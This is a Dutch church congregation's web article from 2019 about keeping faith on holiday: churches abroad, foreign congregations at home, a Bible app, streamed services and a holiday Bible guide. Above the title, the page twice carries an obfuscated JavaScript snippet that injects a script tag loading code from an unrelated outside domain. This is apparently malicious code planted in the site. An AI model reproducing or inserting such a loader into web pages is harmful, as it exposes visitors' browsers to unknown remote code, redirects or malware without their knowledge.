;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerk op vakantie - PKN Damwâld

Kerk op vakantie

Gepubliceerd op: maandag 24 juni 2019

Nog even en de zomervakantie staat weer voor de deur. In de kerk loopt het seizoen ten einde en breekt er een tijd van rust en genieten aan. De plannen voor de vakantie zijn rond en straks de koffers pakken. Neem je dan ook je kerk mee? Of de Bijbel? Laat je op je vakantieadres zien in de kerk. In Europa werkt de GZB in onder andere Frankrijk, Tsjechië en Duitsland. In deze landen zijn de protestantse gemeenten vaak klein. Het is dan erg bemoedigend om gasten te ontvangen en zich verbonden te voelen met christenen uit een ander land. Kijk hier waar u naar de kerk kunt:

· Frankrijk: http://www.unepref.com/unepref-eglises-menu
· Tsjechië: portal.cb.cz/sbory/mapa
· Duitsland: www.feg.de
· Diverse landen: www.connectedchurches.nl/map

Ook op Kerktijden.nl zijn gegevens van Nederlandstalige diensten in het buitenland te vinden. Deze site geeft informatie over reformatorische kerkdiensten.

Buitenland in de buurt – Wie in Nederland vakantie viert en thuis blijft, kan in de eigen woonplaats op zoek naar een vleugje  buitenland:  een viering in een onbekende taal, met onbekende rituelen.  Zo’n kennismaking met een buitenlandse christelijke gemeenschap in Nederland  kan tot verrassende ontmoetingen leiden… Zo blijkt er in Amersfoort een Chinese Protestantse Kerk te zijn, in Amsterdam een Syrisch orthodoxe Kerk, en in Hemelum een Russisch Orthodox klooster H. Nikolaas de Wonderdoener.

Digitale mogelijkheden … Je eigen kerk mee !
Je neemt vast je mobieltje mee en je tablet! En nu al helemaal nu internetten binnen Europa geen bergen met geld meer kost en je binnen je abonnement ook in het buitenland van Internet gebruik kan maken. En dat biedt mogelijkheden. Want wist je dat er meerdere apps zijn die je kerk en de Bijbel dicht bij je houden! Waar je ook bent.

De Bijbel – De Bijbel kent vele verschijningsvormen. De nieuwste is de Bijbel als app op je telefoon. Het is een app van het Nederlands Bijbelgenootschap en is vrij te downloaden via Google Play store (android) of de App store (Apple) . Je kunt de Bijbel in verschillende vertalingen lezen, en daar ook tussen switchen, net waar je het voor wilt gebruiken. De Bijbelvertalingen kun je per stuk downloaden, zodat de Bijbel ook offline te lezen is. Naast de Bijbelboeken biedt de app ook leesplannen voor wie wat extra hulp of uitleg wil. Zo is/was er een leesplan voor de 40-dagen tijd, een Bijbel-leesrooster met iedere dag een passage uit de Bijbel met toelichting, een vakantie-leesrooster en meer. Het leuke is dat je met zo’n leesplan (waar je je met een druk op de knop voor kunt aanmelden en ook weer afmelden) standaard een melding krijgt om de Bijbel te lezen. En automatisch lees je dan toch vaak door en ben je zo dagelijks even (extra) bezig met je geloof. Heel laagdrempelig en overal te gebruiken. Probeer het maar!

Kerkdiensten – Steeds meer kerken zenden hun kerkdiensten uit via internet. Ook via onze website pkndamwald.nl kun je de preek/preken terugluisteren. Maar ook ander kerken kun je volgen. Vaak te zien via hun website en je kan live meekijken wat er thuis in je kerk gebeurd. Via de website www.protestantsekerk.nl/kerkzoeker  kunt je heel veel kerken en kerkdiensten vinden in Nederland.

Op adem komen – Onder meer in de hal van de Bonifatiuskerk kunt u de geheel vernieuwde Ark Mission Vakantiebijbelgids vinden! Deze zomer staat het thema ‘Op adem komen’ centraal en biedt de gids drie weken aan overdenkingen, vakantietips en meer. De vernieuwde maar traditionele Vakantiebijbelgids heeft het bijbelboek Psalmen als leidraad en biedt drie weken aan overdenkingen. Week één vertelt iets over het verlangen naar God. Week twee gaat dieper in op het vertrouwen op God en week drie beschrijft hoe je kunt genieten samen met God. Daarnaast is ook een zomeragenda opgenomen en een puzzel met kans op mooie prijzen. De 32 pagina’s tellende Vakantiebijbelgids nodigt uit om te lezen en na te denken over het geloof en de praktische betekenis van het ‘op adem komen’ in ons leven.De Ark Mission Vakantiebijbelgids kan ook online gelezen worden via www.arkmission.nl. Wie liever de gedrukte versie in handen heeft, kan bovendien een gratis exemplaar afhalen bij de christelijke boekhandel.Ark Mission is al ruim 100 jaar actief in het verspreiden van Het Verhaal van de Bijbel in binnen- en buitenland. Voorbeelden hiervan zijn Bible-Fit, de Bajesagenda, Kinderbijbels.nl en de Ark Mission Vakantiebijbelgids. Het werk van de organisatie wordt gefinancierd uit giften van donateurs en kerken. Meer informatie leest u op www.arkmission.nl.

Fijne vakantie!
Er zijn vast nog veel mee mogelijkheden om je kerk en de Bijbel in je koffer mee te nemen op vakantie. In ieder geval laten wij met dit artikel zien dat er digitaal steeds meer mooie mogelijkheden zijn. We wensen je alvast een fijne vakantie in Gods mooie wereld!